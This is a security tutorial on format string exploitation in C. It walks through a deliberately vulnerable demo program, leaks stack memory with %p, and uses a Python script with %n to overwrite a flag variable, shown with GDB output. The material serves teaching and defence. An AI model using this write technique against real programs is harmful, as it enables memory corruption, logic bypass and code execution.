Format String Exploitation

A format string defines the way in which data will be represented when printed. For instance, the following C code will output the current year:

printf ("This year is: %d\n", 2019); 

If the format string itself is derived from user input, rather than being a fixed string with the user's data passed as a separate argument, this may lead to a format string vulnerability.

Exploiting the vulnerability allows an attacker to read arbitrary memory locations, which assists further memory corruption attacks by undermining the effectiveness of ASLR.

In addition, an attacker may be able to write to arbitrary memory locations and achieve code execution.

The code listing below shows an application that is vulnerable to format string exploitation.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int security_flag;

void victory()
{
  printf("Security check passed!\n");
}

void failure()
{
  printf("Security check failed!\n");
}

void get_password()
{
  security_flag = 0;

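  char buffer[512];
  /* Read one line of user input (at most 511 characters). */
  fgets(buffer, sizeof(buffer), stdin);
  /* Vulnerable: the user's input is passed to printf as the format string. */
  printf(buffer);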

  if (security_flag > 1)
  { 
     victory();
  }
  else
  {
     failure();
  }

  exit(1);   
}

int main(int argc, char **argv)
{
  get_password();
}

Reading Memory Locations

The “%p” format string parameter prints its argument as a pointer value. If the format string contains more parameters than there are arguments supplied to printf, the extra parameters read whatever values come next on the stack.

./format_string_demo
AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d
Security check failed!

The above example shows stack memory being displayed after using the “%p” format string. The “AAAA” characters we entered are echoed back in hexadecimal (0x41414141) as the seventh value, which means the input buffer itself is within reach of printf's argument list.
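The leaked words can be decoded to confirm what they hold. The sketch below is a minimal illustration: it takes the output line from the run above, finds which argument position holds 0x41414141, and unpacks the words from there on as little-endian bytes (an assumption that holds for 32-bit x86). The helper name decode_words is hypothetical.

```python
import struct

# Output line copied from the run above.
leak = ("AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-"
        "0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d")

# Field 0 is the literal "AAAA"; field N is the value printed by the Nth %p.
fields = leak.split('-')
position = fields.index('0x41414141')

def decode_words(words):
    """Pack each 32-bit word as little-endian and join the bytes."""
    return b''.join(struct.pack('<I', int(w, 16)) for w in words)

print(position)                          # argument position of the buffer
print(decode_words(fields[position:]))   # start of the input as stored on the stack
```

The words that follow 0x41414141 decode to the “-%p-%p” text itself, so printf is reading back its own format string from the buffer.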

Writing to Memory

While the above behavior is interesting, to subvert the application logic and reach the victory function we need to set the “security_flag” variable to a value greater than 1. This can be achieved using the “%n” format string parameter. Rather than printing anything, this parameter takes the number of characters written so far and stores it in the integer pointed to by the corresponding argument.

First, we need to find the address of the security_flag variable. We can do this using GDB:

(gdb) break main
Breakpoint 1 at 0x804859b
(gdb) run
Starting program: /home/user/format_string_demo 
Breakpoint 1, 0x0804859b in main ()
(gdb) p &security_flag
$1 = (<data variable, no debug info> *) 0x804a048 <security_flag>

So, we know we need to write a value greater than 1 to the address 0x804a048.
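Because the address will be placed inside the input, it is worth checking that its packed bytes survive the trip through fgets and printf: fgets stops reading after a newline, and printf stops parsing the format string at a NUL byte. The following is a minimal sketch assuming a 32-bit little-endian target; the helper name has_bad_bytes is hypothetical.

```python
import struct

def has_bad_bytes(address):
    """Return True if the packed address contains a NUL or newline byte."""
    packed = struct.pack('<I', address)
    return b'\x00' in packed or b'\n' in packed

packed = struct.pack('<I', 0x804a048)
print(packed)                     # the four bytes as they will sit in the buffer
print(has_bad_bytes(0x804a048))   # whether the address is unusable as-is
```

The first packed byte, 0x48, is the ASCII character H; the remaining three bytes are not printable.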

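#!/usr/bin/python
import struct
import sys

# Address of security_flag as 4 little-endian bytes (32-bit x86).
buf = struct.pack('<I', 0x804a048)
# Three conversions consume the three stack words that precede the buffer.
buf += b'%u' * 3
# %n stores the number of characters output so far at the next argument,
# which is now the address at the start of the buffer.
buf += b'%n\n'

# Write raw bytes; sys.stdout.buffer exists only on Python 3.
getattr(sys.stdout, 'buffer', sys.stdout).write(buf)

The above exploit first packs the address we wish to write to, then uses three %u parameters to step past the three stack words that sit between printf's format argument and the start of the buffer in the build disassembled below. The %n parameter therefore takes the packed address as its argument and stores the number of characters output so far at that address: the 4 address bytes plus the digits printed by the three %u parameters.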
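The same payload shape can be produced for a buffer at any argument position. The sketch below uses a hypothetical helper, build_payload, and assumes that the address sits at the very start of the buffer and that each padding parameter consumes exactly one 4-byte stack word (true of %p, %u, and %x on 32-bit x86).

```python
import struct

def build_payload(address, buffer_position, pad=b'%u'):
    """Build address + padding parameters + %n.

    buffer_position is the 1-based printf argument position at which the
    buffer starts, so buffer_position - 1 words must be consumed first.
    """
    if buffer_position < 1:
        raise ValueError('buffer_position is 1-based')
    return struct.pack('<I', address) + pad * (buffer_position - 1) + b'%n'

# Three padding parameters, matching the script above.
print(build_payload(0x804a048, 4))
```

For the earlier run in which 0x41414141 appeared as the seventh value, the same call with a position of 7 would emit six padding parameters instead of three.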

We can run the script, and output the contents to a file:

python exploit.py > out

Then load the target executable in GDB and set a breakpoint on the call to exit at the end of the get_password function:

(gdb) disassemble get_password
Dump of assembler code for function get_password:
   0x080484ed <+0>:	push   %ebp
   0x080484ee <+1>:	mov    %esp,%ebp
   0x080484f0 <+3>:	sub    $0x208,%esp
   0x080484f6 <+9>:	movl   $0x0,0x804a048
   0x08048500 <+19>:	mov    0x804a040,%eax
   0x08048505 <+24>:	sub    $0x4,%esp
   0x08048508 <+27>:	push   %eax
   0x08048509 <+28>:	push   $0x200
   0x0804850e <+33>:	lea    -0x208(%ebp),%eax
   0x08048514 <+39>:	push   %eax
   0x08048515 <+40>:	call   0x8048370 <fgets@plt>
   0x0804851a <+45>:	add    $0x10,%esp
   0x0804851d <+48>:	sub    $0xc,%esp
   0x08048520 <+51>:	lea    -0x208(%ebp),%eax
   0x08048526 <+57>:	push   %eax
   0x08048527 <+58>:	call   0x8048360 <printf@plt>
   0x0804852c <+63>:	add    $0x10,%esp
   0x0804852f <+66>:	mov    0x804a048,%eax
   0x08048534 <+71>:	cmp    $0x1,%eax
   0x08048537 <+74>:	jle    0x8048540 <get_password+83>
   0x08048539 <+76>:	call   0x80484bb <victory>
   0x0804853e <+81>:	jmp    0x8048545 <get_password+88>
   0x08048540 <+83>:	call   0x80484d4 <failure>
   0x08048545 <+88>:	sub    $0xc,%esp
   0x08048548 <+91>:	push   $0x1
   0x0804854a <+93>:	call   0x8048390 <exit@plt>
End of assembler dump.
(gdb) break * 0x0804854a
Breakpoint 1 at 0x804854a

Next, run the application with the exploit file as input and inspect the value of the security_flag variable:

(gdb) run < out
Starting program: /home/user/format_string_demo < out
H51230867961923086950698
Security check passed!

Breakpoint 1, 0x0804854a in get_password ()
(gdb) p/s security_flag
$2 = 27

The security check passes because %n has written 27, which is greater than 1, to the address of security_flag.
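The value 27 can be reproduced from the output printed before the breakpoint. The sketch below assumes that the 23 digits after the H are three stack words printed in decimal (0x200, 0xb7fcc5a0, and 0xb7ff212a; this is an inference from the digits, not something the transcript states) and that the three address bytes after H are non-printable and so do not show in the terminal.

```python
import struct

address = struct.pack('<I', 0x804a048)      # 4 bytes, output first
words = [0x200, 0xb7fcc5a0, 0xb7ff212a]     # assumed stack words
digits = ''.join(str(w) for w in words)     # decimal rendering of each word

written = len(address) + len(digits)        # characters output before %n
print(digits)
print(written)
```

Under those assumptions the digit string matches the transcript, and the total is the count that %n stores.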